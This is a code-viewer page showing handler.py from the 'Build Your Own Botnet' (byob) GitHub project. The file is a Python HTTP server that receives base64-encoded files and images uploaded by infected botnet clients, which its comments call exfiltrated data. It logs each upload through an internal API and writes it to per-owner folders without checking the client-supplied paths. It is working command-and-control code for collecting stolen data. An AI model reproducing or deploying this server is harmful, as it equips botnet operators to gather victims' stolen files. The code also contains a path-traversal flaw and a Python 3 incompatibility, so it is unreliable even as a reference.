Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
malwaredllc
GitHub Repository: malwaredllc/byob
 Path: blob/master/web-gui/buildyourownbotnet/core/handler.py
1292 views
1
#!/usr/bin/python

2
'POST Request Handler (Build Your Own Botnet)'

3


4
# standard library

5
import os

6
import sys

7
import json

8
import string

9
import base64

10
import random

11
import requests

12


13
if sys.version_info[0] < 3:

14
	from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer

15
else:

16
	from http.server import BaseHTTPRequestHandler, HTTPServer

17


18


19
OUTPUT_DIR = ''

20


21


22
class Handler(BaseHTTPRequestHandler):

23
	"""

24
	HTTP POST request handler for clients uploading

25
	captured images/data to the server

26
	"""

27
	def _set_headers(self):

28
		self.send_response(200)

29
		self.send_header('Content-type', 'text/html')

30
		self.end_headers()

31


32


33
	def do_POST(self):

34
		"""

35
		Handle incoming HTTP POST request

36


37
		"""

38
		self._set_headers()

39
		self.data_string = self.rfile.read(int(self.headers['Content-Length']))

40
		self.send_response(200)

41
		self.end_headers()

42


43
		json_data = json.loads(self.data_string)

44


45
		b64_data = json_data.get('data')

46
		filetype = json_data.get('type')

47
		owner = json_data.get('owner')

48
		module = json_data.get('module')

49
		session = json_data.get('session')

50
		filename = json_data.get('filename')

51


52
		# decode any base64 values

53
		data = base64.b64decode(b64_data)

54
		if session.startswith('_b64'):

55
			session = base64.b64decode(session[6:]).decode('ascii')

56


57
		# add . to file extension if necessary

58
		if not filetype.startswith('.'):

59
			filetype = '.' + filetype

60


61
		# generate random filename if not specified

62
		if not filename:

63
			filename = str().join([random.choice(string.lowercase + string.digits) for _ in range(3)]) + filetype

64


65
		output_path = os.path.join(OUTPUT_DIR, owner, 'files', filename)

66


67
		# add exfiltrated file to database via internal API call

68
		requests.post("http://0.0.0.0/api/file/add", {"filename": filename, "owner": owner, "module": module, "session": session})

69


70
		# save exfiltrated file to user directory

71
		with open(output_path, 'wb') as fp:

72
			fp.write(data)

73


74


75
def run(server_class=HTTPServer, handler_class=Handler, port=80):

76
	httpd = server_class(('0.0.0.0', port), handler_class)

77
	httpd.serve_forever()

78


79


80
def main():

81
	global OUTPUT_DIR

82
	port = int(sys.argv[1])

83
	OUTPUT_DIR = sys.argv[2]

84
	run(port=port)

85


86


87
if __name__ == '__main__':

88
	main()

89


90